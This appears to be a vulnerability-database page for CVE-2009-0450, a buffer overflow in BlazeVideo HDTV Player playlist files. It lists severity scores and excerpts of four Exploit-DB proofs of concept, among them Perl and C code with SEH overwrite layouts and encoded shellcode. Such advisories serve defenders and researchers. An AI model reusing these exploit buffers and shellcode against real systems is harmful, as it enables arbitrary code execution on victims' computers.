CVE-2009-0450
published 2009-02-10CVE-2009-0450: Stack-based buffer overflow in BlazeVideo HDTV Player 3.5 and earlier allows remote attackers to execute arbitrary code via a long string in a playlist (aka…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
10.14%
95.1th percentile
Stack-based buffer overflow in BlazeVideo HDTV Player 3.5 and earlier allows remote attackers to execute arbitrary code via a long string in a playlist (aka .plf) file.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| blazevideo | hdtv_player | <= 3.5 | — |
| blazevideo | hdtv_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass
exploitdb·2011-10-07
CVE-2009-0450 BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass
BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass
---
# Exploit Title: BlazeVideo HDTV Player 6.6 Professional (Universal DEP+ASLR Bypass)
# Author: modpr0be
# Software Download: http://www.blazevideo.com/download.php?product=blazevideo-hdtv-pro
# Date: 07/10/2011
# Tested on: Windows XP SP3, Windows Vista SP2, Windows 7 SP1
# Thanks: corelanc0d3r, cyb3r.anbu, otoy, sickness, 5m7x, loneferret, _sinn3r, mr_me
# Take a look at mona.py :) awesome tool developed by corelanc0d3r and his team:
# https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
# this is the old fashioned bug, i just try to make it universal :)
# it has also been exploited by:
# Greg Linares: http://www.exploit-db.com/exploits/2880
# LiquidWorm: http://www.exploit-db.com/exploits/7975
# hack
Exploit-DB
BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)
exploitdb·2009-08-04
CVE-2009-0450 BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)
BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by ThE g0bL!N
#THNX: His0k4 Wahdo :)
#BlazeDVD 5.1 Professional/Blaze HDTV Player 6.0 /(.PLF File) Universal Buffer Overflow Exploit (SEH)
##################################################################
my $bof="x41" x 608;
my $nsh="xEBx06x90x90";
my $seh="x71xFBx32x60" ;# Universal Address
my $nop="x90" x 20;
my $sec=
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x50x42x50x42x30x4bx38x45x34x4ex43x4bx48x4ex47".
"x45x30x4ax47x41x50x4fx4ex4bx48x4fx44x4ax41x4bx48".
"x4fx55x42x52x41x3
Exploit-DB
BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow
exploitdb·2009-02-04
CVE-2009-0450 BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow
BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow
---
#!/usr/bin/python
#
# Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Heap Overflow Exploit
#
# Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV
# Player software, combining HDTV playback, FM receiving, video record and DVD playback
# functions. You can make advantage of PC monitor's high resolution, watch, record, playback
# high definition HDTV program or teletext broadcast program.
#
# Product web page: http://www.blazevideo.com/hdtv-player/index.htm
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# ------------------------------------windbg------------------------------------
#
# (620.d74): Access violation - code c0000005 (first chance)
# First chance
Exploit-DB
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow
exploitdb·2006-12-01
CVE-2009-0450 BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow
---
/*
0-day BlazeVideo HDTV Player
30 days of Media Player Exploits by Greg Linares
Discovered and Reported By: Greg Linares [email protected]
Reported Exploit Date: 12/1/2006
*/
#include
#include
#include
int main(int argc, char *argv[])
{
FILE *Exploit;
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";
/* replace it with your own shellco
No writeups or analysis indexed.
2009-02-10
Published